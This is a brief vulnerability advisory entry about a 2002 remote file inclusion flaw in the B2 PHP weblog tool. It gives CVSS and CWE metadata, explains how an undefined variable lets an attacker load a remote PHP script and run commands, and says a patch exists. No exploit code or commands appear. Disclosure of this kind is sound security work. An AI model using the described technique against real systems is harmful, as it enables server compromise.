Vendor: B2
By: SecurityFocus
CVSS: 7.5 (HIGH)
Variable Reference Vulnerability
CWE: 20
Product Name: B2
Affected Version From: 2000.6.1
Affected Version To: 2000.6.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:b2:b2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix and Linux
2002
B2 News/Weblog Tool Variable Reference Vulnerability
B2 is a news/weblog tool written in PHP. Its PHP scripts reference a variable that is never actually defined, so an attacker may be able to define the value of that variable. By creating a PHP script on a remote host and embedding commands in it, the attacker is able to reference the remote file through the variable. This could potentially allow the attacker to execute commands on the vulnerable system.
Mitigation:
The vendor has released a patch to address this issue. Users should upgrade to the latest version of B2.